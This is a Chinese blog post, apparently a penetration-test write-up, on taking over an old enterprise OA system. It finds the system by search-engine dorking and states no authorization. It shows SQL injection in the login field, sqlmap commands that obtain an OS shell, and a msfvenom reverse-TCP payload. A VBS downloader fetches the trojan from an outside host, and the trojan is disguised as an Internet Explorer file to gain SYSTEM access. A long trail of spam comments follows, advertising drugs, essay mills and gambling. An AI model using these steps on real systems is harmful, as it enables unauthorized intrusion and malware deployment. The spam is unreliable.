简单的漏洞,破坏性影响。
0x01 发现漏洞
七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统
IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入
在用户名里输入admin’,不负期望地报了错
很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。
0x02 漏洞验证
打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
问题参数为 txtLogin=admin%27
可将整个请求复制到 test.txt,使用sqlmap -r 来注入
sqlmap -u http://x.x.x.x/xx.aspx --forms
至此,可以确认存在 error-based、stack quires和time-based三个类型的漏洞
0x03 判断数据库用户的权限
发现SQL注入后,首先要判断权限,高权限的注入可以为后续渗透省下很大功夫
sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba
非常nice,再次不负期望地返回了DBA权限
输入以下命令,获得一个shell
sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell
NT/SYSTEM权限,时隔两个多月,复现有误,不予贴图
0x04 反弹shell 深入内网
生成一个shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe
由于环境艰难,不能直接上传文件,我选择了用vbs脚本来下载木马到服务器
代码如下:
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://x.x.x.x/shell.exe"
'发送请求
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
'等待3秒,等文件下载
wscript.sleep 3000
aGet.Write(post.responseBody)'写数据
aGet.SaveToFile "shell.exe",2用echo命令缓慢地写完了vbs脚本之后,顺利运行,下载了木马
更改名字,移动到IE安装目录进行伪装
start iee.exe 运行木马
metasploit成功收到了SYSTEM权限的shell
该主机拥有内网IP,存在内网,可以互通,并且该主机作为中央数据库
此内网主机皆为VMware虚拟机
0x05 结束测试,提交漏洞
本次渗透测试成功拿到最高权限, 到此为止,不再深入。
随着攻击与防御技术的彼此攀升,程序员的安全意识逐渐提高,SQL也越来越少。
但不少粗糙的程序和古老的系统仍然存在此漏洞,此类漏洞解决方法简单,只用对用户输入参数稍加处理即可。
很好!
好好学习,明年叫你用Linux建博客
牛逼,说的很有用处
哈哈哈,这场捧的
wow 勉为其难的踩一个叭
我打你哦
这个码打得好啊
哈哈,还好吧
Appreciate you sharing, great blog article. Fantastic.
Very good blog post.Really thank you! Will read on…
Fantastic article post.Thanks Again.
Great blog post.Really looking forward to read more. Really Great.
Very neat article.Thanks Again. Really Cool.
Very informative blog post.Really looking forward to read more. Really Great.
Thank you ever so for you post. Awesome.
Very neat blog post.Really thank you! Great.
Great blog article.Really looking forward to read more. Keep writing.
Great blog.Much thanks again.
I have been reading out a few of your articles and i must say pretty nice stuff. I will make sure to bookmark your blog.
Great blog article.Much thanks again.
You write Formidable articles, keep up good work.
Awesome blog post.Much thanks again. Keep writing.
Enjoyed every bit of your article post.Really looking forward to read more. Keep writing.
Appreciate you sharing, great blog.Really thank you! Much obliged.
Very informative article post.Really looking forward to read more. Will read on…
Awesome blog post.Thanks Again. Awesome.
wow, awesome article. Want more.
Very good blog.Really thank you! Cool.
I really like and appreciate your post.Thanks Again. Awesome.
I really like and appreciate your post.Really looking forward to read more.
Fantastic blog.Thanks Again. Much obliged.
I love your blog. It looks every informative.
Thanks for ones marvelous posting! I truly enjoyed reading it, you will be a great author.
I will make certain to bookmark your blog and may come back later in life.
I want to encourage you to continue your great work,
have a nice evening!
I really like and appreciate your article post.Really looking forward to read more. Really Cool.
Makes sense to me.
Thank you for your blog. Keep writing.
Great post.Really looking forward to read more. Will read on…
Thank you for your article post.Thanks Again. Great.
Awesome blog post. Fantastic.
Thank you for your blog.Thanks Again. Awesome.
Very good article post. Want more.
I used to be able to find good information from your blog posts.
Awesome blog post.Really thank you! Fantastic.
Very informative blog post.Really thank you! Really Great.
ivermectin for sale humans ivermectin human
I imagine so. Very good stuff, I agree totally.
How do I subscribe to your blog? Thanks for your help.
What a great article.. i subscribed btw!
free bitcoins verdienenBitcoin for live cd11e72
Absolutely written written content , regards for information .
Very good info. Lucky me I found your site by chance (stumbleupon). I have bookmarked it for later.
I couldn’t refrain from commenting. Exceptionally well written!
Well, I don’t know if that’s going to work for me, but definitely worked for you! 🙂 Excellent post!
tinder sign up , browse tinder for freehow to use tinder
Have you given any kind of thought at all with converting your current web-site into French? I know a couple of of translaters here that will would certainly help you do it for no cost if you want to get in touch with me personally.
gnc ed pills – ed pills otc roman ed pills
pay someone to write an essaywriting a narrative essay about yourselfeasy essay writing
zithromax capsules australia: zithromax for sale – zithromax antibiotic
Appreciate it. A lot of content. custom paper writing service reviews write your essay
Looking forward to reading more. Great blog.Really thank you! Really Great.
สล็อตออนไลน์คนไหนกันได้ทดลองเล่นเป็นต้องชอบอกชอบใจ เนื่องจากลักษณะของเกมง่าย แต่ที่สำคัญไปกว่านั้นเป็นทำเงินได้มากถึง 400-500 เท่าของทุนเลย ไม่เพียงเท่านั้น UFABET ยังเพิ่มรางวัล รวมทั้งแจ็คพอตเพื่อเพิ่มโอกาสให้ผู้เล่นได้เงินง่ายมากยิ่งขึ้นอีกด้วย
I used to be able to find good advice from your blog articles.
Hello
I was able to find good information from your blog posts.
I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.
proair versus ventolin ventolin 108 mcg how to use albuterol without a nebulizer how often to use ventolin inhaler
I really liked your blog.Much thanks again. Much obliged.
ivermectin 1 – iverceitin.com generic stromectol
Awesome blog.Thanks Again. Really Cool.
I will right away take hold of your rss as I can not in finding your e-mail subscription link or newsletter service. Do you’ve any? Kindly let me know in order that I may just subscribe. Thanks.
You said that exceptionally well.personal essay college application college essay online custom writing services
Wow, great article post.Much thanks again. Much obliged.
Fantastic blog article. Want more.
Very informative post.Really looking forward to read more. Really Great.
I loved your blog post.Thanks Again. Much obliged.
Fantastic blog article.Really thank you! Keep writing.
ترجمه زبان تخصصی حسابداری جلد دوم عبدالرضا تالانه
Very neat blog. Great.
Nicely put, Thanks a lot!professional essay writer hello kitty writing paper academic freelance writers
help writing papers for college — academicwriting need help writing a paper
Enjoyed every bit of your blog article.Thanks Again. Fantastic.
We at present do not very personal an automobile however anytime I purchase it in future it all definitely undoubtedly be a Ford style!
ivermectin for swine cattle ivermectin for humans
Thank you for your post.Much thanks again. Will read on…
Very informative post.Really looking forward to read more. Great.
I don’t normally comment on blogs.. But nice post! I just bookmarked your site
Good Morning everybody , can anyone recommend where I can purchase Zesty Lemon CBD Tincture By Og Labs?
I’ll right away grasp your rss feed as I can not to find youre-mail subscription link or newsletter service.Do you have any? Kindly let me recognize so that I may subscribe.Thanks.
Enjoyed every bit of your blog post. Want more.
I can’t go into details, but I have to say its a good article!
Say, you got a nice post.Really looking forward to read more. Great.
Thank you ever so for you blog article. Awesome.
I could not refrain from commenting. Exceptionally well written!
Looking forward to reading more. Great article post. Great.
Wow, great blog post. Keep writing.
I really liked your blog post.Thanks Again. Want more.
achei muito bacana este post e vou tentar adaptar em meunegócio . Você me permite indicar este link para minha base de clientes viaemail ?
I loved your blog. Want more.
Really informative blog post.Thanks Again. Keep writing.
stromectol for human – stromectol human stromectol tablets for sale
wow, awesome blog article.Really looking forward to read more. Really Cool.
Awesome blog article.Really looking forward to read more. Really Cool.
local personalslocal girla near me personals
Very neat post.Really looking forward to read more. Great.
Great article post.Really looking forward to read more. Cool.Loading…
Enjoyed every bit of your blog.Really looking forward to read more. Really Cool.
Thank you for your article.Really looking forward to read more. Will read on…
ivermectin injectable dosage for goats orally ivermectin drench for goats
Very informative blog post.Really thank you! Cool.